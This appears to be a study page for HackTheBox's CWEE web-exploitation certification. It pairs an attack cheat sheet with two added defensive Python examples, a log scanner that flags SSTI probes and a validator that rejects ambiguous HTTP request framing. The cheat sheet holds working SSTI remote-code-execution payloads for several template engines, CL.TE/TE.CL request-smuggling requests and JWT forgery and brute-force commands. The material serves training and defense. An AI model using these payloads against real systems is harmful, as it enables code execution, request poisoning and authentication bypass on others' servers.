CWEE
HackTheBox

HTB Certified Web Exploitation Expert

Expert · Practical exam · Pass: Passing report · $210

Advanced web exploitation — deserialization, race conditions, prototype pollution, OAuth.

Official Page
Issuer: HackTheBox
Format: Practical exam
Duration: 10 days
Pass Score: Passing report
Cheat Sheets
Advanced Web Exploitation Reference

SSTI Payloads by Template Engine

# Detection
{{7*7}} → 49 (Jinja2/Twig)
${7*7} → 49 (FreeMarker/Smarty)
<%= 7*7 %> → 49 (ERB/EJS)

# Jinja2 (Python Flask/Django) → RCE
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[408]('id',shell=True,stdout=-1).communicate()[0].strip() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# FreeMarker (Java)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

# Pebble (Java)
{%set x = [1]%}{%for i in x%}{{i.class.forName('java.lang.Runtime').getMethod('exec',''.class).invoke(i.class.forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')}}{% endfor %}
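The payloads above are what a probe looks like on the wire; the defender's side is spotting them in access logs. The following is an added detection example (not HackTheBox material and not part of the cheat sheet): it percent-decodes each request target, looks for the delimiter families listed above, and flags expressions that carry an arithmetic probe or a known gadget token. The log lines, IPs and paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=hello HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 540
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /profile?name=%24%7B7*7%7D HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page?t=%3C%25%3D7*7%25%3E HTTP/1.1" 200 530
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=%7B%7Bconfig.__class__%7D%7D HTTP/1.1" 500 120
10.0.0.3 - - [01/Jan/2024:10:00:06 +0000] "GET /docs?page=prices HTTP/1.1" 200 900
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Delimiter families from the cheat sheet, mapped to the engines they usually indicate.
DELIMITERS = [
    (re.compile(r"\{\{(.+?)\}\}", re.S), "Jinja2/Twig/Pebble"),
    (re.compile(r"\$\{(.+?)\}", re.S), "FreeMarker/Smarty"),
    (re.compile(r"<%=(.+?)%>", re.S), "ERB/EJS"),
    (re.compile(r"<#assign\b(.+?)>", re.S), "FreeMarker"),
]

# Content that turns a delimited expression into a probe: "7*7"-style arithmetic,
# or one of the object-walking tokens used by the RCE payloads above.
ARITHMETIC_PROBE = re.compile(r"\b\d+\s*[*+]\s*\d+\b")
GADGET_TOKENS = (
    "__class__", "__globals__", "__subclasses__", "__mro__",
    "_self.env", "?new()", "forName(", "getRuntime",
)


def classify(expr):
    """Return a reason string if the expression looks like an SSTI probe, else None."""
    if ARITHMETIC_PROBE.search(expr):
        return "arithmetic probe"
    for tok in GADGET_TOKENS:
        if tok in expr:
            return f"gadget token {tok!r}"
    return None


def scan_log(text):
    """Scan log text and return one finding per suspicious template expression."""
    findings = []
    for raw in text.splitlines():
        m = LOG_LINE.match(raw)
        if not m:
            continue
        # Undo percent-encoding first; scanners send {{7*7}} as %7B%7B7*7%7D%7D.
        decoded = unquote_plus(m.group("target"))
        for pattern, engine in DELIMITERS:
            for dm in pattern.finditer(decoded):
                reason = classify(dm.group(1))
                if reason:
                    findings.append({
                        "ip": m.group("ip"),
                        "target": decoded,
                        "engine_hint": engine,
                        "reason": reason,
                        "status": int(m.group("status")),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['status']} {f['engine_hint']:<22} {f['reason']:<26} {f['target']}")
```

A 500 on a flagged request (the last sample line) is the strongest signal: the expression reached the template engine and broke it, which is worth an immediate look at the handler that renders that parameter.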

HTTP Request Smuggling

# CL.TE attack — poison backend queue
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

# TE.CL attack
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


# Detect with timing (CL.TE)
POST / HTTP/1.1
Transfer-Encoding: chunked
Content-Length: 4

1
A
X  # Frontend forwards only Content-Length=4 bytes; backend waits for the terminating 0 chunk → timeout
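Every request above works because the front end and back end disagree on where the body ends. The mitigation is to refuse any request whose framing is ambiguous before it reaches the back end. The following is an added example (not HackTheBox material and not part of the cheat sheet) of that check on a raw request head: it rejects a Content-Length/Transfer-Encoding combination, conflicting Content-Length values, non-numeric lengths, obfuscated Transfer-Encoding values, and header names with whitespace or illegal characters before the colon. The request bytes are constructed for the example; the CL.TE request reuses the one shown above.

```python
import re

# Header names must be RFC 7230 tokens; "Content-Length :" (space before colon) is not one.
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def check_framing(raw: bytes):
    """Return (accepted, reason). Rejects any request whose body length
    could be read differently by two parsers in the chain."""
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False, "incomplete header block"
    lines = head.split(b"\r\n")
    content_lengths = []
    transfer_encodings = []
    for line in lines[1:]:  # skip the request line
        if not line or line[:1] in (b" ", b"\t"):
            return False, "empty header line or obsolete line folding"
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN.match(name):
            return False, "malformed header name (whitespace or illegal characters before the colon)"
        name = name.lower()
        value = value.strip(b" \t")
        if name == b"content-length":
            content_lengths.append(value)
        elif name == b"transfer-encoding":
            # Split the coding list so "gzip, chunked" is inspected element by element.
            transfer_encodings.extend(v.strip(b" \t") for v in value.split(b","))

    # The CL.TE and TE.CL cases: two framing mechanisms in one request.
    if content_lengths and transfer_encodings:
        return False, "both Content-Length and Transfer-Encoding present"
    if len(set(content_lengths)) > 1:
        return False, "conflicting Content-Length values"
    if content_lengths:
        if not content_lengths[0].isdigit():
            return False, "non-numeric Content-Length"
        return True, "content-length"
    if transfer_encodings:
        # Strict on purpose: anything but a single, exact "chunked" is treated as obfuscation.
        if transfer_encodings != [b"chunked"]:
            return False, "Transfer-Encoding is not exactly 'chunked'"
        return True, "chunked"
    return True, "no body"


# Constructed requests (example.test is a reserved name).
CLEAN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n\r\nx=1"
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
OBFUSCATED_TE = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: xchunked\r\n\r\n0\r\n\r\n"
SPACE_BEFORE_COLON = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("CL.TE", CL_TE),
                       ("obfuscated TE", OBFUSCATED_TE), ("space before colon", SPACE_BEFORE_COLON)]:
        print(f"{label:<20} -> {check_framing(req)}")
```

This check belongs at the first hop (the front-end proxy): a request it rejects never reaches the back end, so there is no second parser to disagree with. Normalising instead of rejecting (dropping Content-Length when Transfer-Encoding is present) is what RFC 7230 permits, but rejecting is the safer default because it also covers back ends that would not recognise the normalised form.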

JWT Attack Payloads

# 1. alg:none attack
# Decode JWT, change alg to "none", remove signature
python3 jwt_tool.py -X a

# 2. RS256 to HS256 key confusion
# Use server's public key as HMAC-SHA256 secret
python3 jwt_tool.py -X k -pk server_pub.pem

# 3. Brute force weak secret
python3 jwt_tool.py -C -d rockyou.txt
hashcat -m 16500 token.txt rockyou.txt

# 4. kid path traversal
# Inject: {"kid": "../../../../dev/null"}
# Sign with empty key ""

# 5. jwk header injection
# Include attacker's public key in JWT header
python3 jwt_tool.py -X i

For HTTP smuggling, use Burp's HTTP Request Smuggler extension (BApp Store) — it automates CL.TE/TE.CL detection and confirms vulnerabilities automatically.